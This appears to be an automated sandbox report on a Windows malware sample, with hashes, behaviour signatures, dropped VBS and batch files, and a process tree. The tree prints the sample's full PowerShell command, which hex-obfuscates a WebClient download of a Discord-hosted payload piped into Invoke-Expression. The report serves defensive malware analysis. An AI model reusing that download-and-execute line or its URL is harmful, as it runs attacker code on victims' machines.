Analysis
- Max time kernel: 136s
- Max time network: 138s
- Platform: windows7_x64
- Resource: win7-en
- Submitted: 13-09-2021 17:28

Static task: static1
Behavioral task: behavioral1
Sample: 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
Resource: win7-en

General
- Target: 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
- Size: 7KB
- MD5: 0152ba660d23a2bb6edda5078fc936fa
- SHA1: 253c14c6dd3e5aaa224b2cb6bfc9a53012896776
- SHA256: 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522
- SHA512: 8c2dbe5d3dce477f24d80b2221bc3ebd48bdc923bb599758e116ef4db05f91c392e484e0f46e072809108d11fc7433481f01b3f7d7a0e184114daad8ee5ab666
Malware Config
- Extracted: https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
    7, 872, powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid, process):
    872, powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description, pid, process):
    Token: SeDebugPrivilege, 872, powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  Processes (description, pid, process, target process):
    PID 2040 wrote to memory of 2008, 2040, 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe, WScript.exe
    PID 2040 wrote to memory of 2008, 2040, 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe, WScript.exe
    PID 2040 wrote to memory of 2008, 2040, 0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe, WScript.exe
    PID 2008 wrote to memory of 568, 2008, WScript.exe, cmd.exe
    PID 2008 wrote to memory of 568, 2008, WScript.exe, cmd.exe
    PID 2008 wrote to memory of 568, 2008, WScript.exe, cmd.exe
    PID 568 wrote to memory of 872, 568, cmd.exe, powershell.exe
    PID 568 wrote to memory of 872, 568, cmd.exe, powershell.exe
    PID 568 wrote to memory of 872, 568, cmd.exe, powershell.exe
Processes (indentation shows process tree depth)
- C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\0992c903425c04bb257f9dc5ae24f2f9315671b711ede082e5705bff5ddf6522.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      Command line: cmd /c ""C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat" "
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -c "$link = 'https://cdn.discordapp.com/attachments/835468911642279977/886054903166947418/Dragon.jpg';$hex = '28 4E 65 77 2D 4F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E 57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 53 74 72 69 6E 67 28 22 24 6C 69 6E 6B 22 29 20 7C 20 49 45 58';$hex.Split(' ') | forEach{[char]([convert]::toint16($_,16))} | forEach{$result=$result+$_};$result | iex"
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Exec.bat
  MD5: 53c8f257e3d32009e9e087dd8ed38da9
  SHA1: ed4f3487930634c56fc02e6d4272eb93a84d7836
  SHA256: 3bb009df04fe062f749515ac36ff348958e8fbfb8897a6d6e0cb34f86e76dd3f
  SHA512: 96c2b00f6c2b876fc0ad47ec68fa414c570c8903924c71d4428fa4878f88d8519a3bcd1c435b480a4959f58ad41802397897dc0ae4cda1a212bf656afe1a9332
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Squad.vbs
  MD5: 232174031b9591e1add2320bf6da9f14
  SHA1: 3f2722464c176abc974441f21fbdeba071d67f5d
  SHA256: 5694b52e005c385d6807e02e45af35cbe39af18bb31325901ac86a633ceb68f7
  SHA512: d675d843204b6aa7077376588dc6ba493a9c300f0f45403daaddb5c4ec8183dec856de966a3fd43e67423674a1240f294b36baec5defb567a474050baa6c51e5
- C:\Users\Admin\AppData\Local\Microsoft\Windows\key.bin
  MD5: 138a4669ce7b2e27012c9f4ffc3993fe
  SHA1: 20f6df71b5d0e20e6ffa7474e3f95cb87b5a8fd0
  SHA256: 83a39301950ddd38becff29f6645556fa25b1eea21148a40ae26ecdafc603206
  SHA512: cae661b658bd171702614162c2da42fa42c72070a806535167a33923b94855f81504ca2e18b6584aba04650a303e29d1eaada86c6e57171a9badd28112a5e09d
- memory/568-59-0x0000000000000000-mapping.dmp
- memory/872-65-0x0000000002872000-0x0000000002874000-memory.dmp (Filesize: 8KB)
- memory/872-60-0x0000000000000000-mapping.dmp
- memory/872-62-0x000007FEF1DF0000-0x000007FEF294D000-memory.dmp (Filesize: 11.4MB)
- memory/872-64-0x0000000002870000-0x0000000002872000-memory.dmp (Filesize: 8KB)
- memory/872-66-0x0000000002874000-0x0000000002877000-memory.dmp (Filesize: 12KB)
- memory/872-63-0x000000001B710000-0x000000001BA0F000-memory.dmp (Filesize: 3.0MB)
- memory/872-67-0x000000000287B000-0x000000000289A000-memory.dmp (Filesize: 124KB)
- memory/2008-57-0x000007FEFB651000-0x000007FEFB653000-memory.dmp (Filesize: 8KB)
- memory/2008-55-0x0000000000000000-mapping.dmp
- memory/2040-53-0x0000000000270000-0x0000000000271000-memory.dmp (Filesize: 4KB)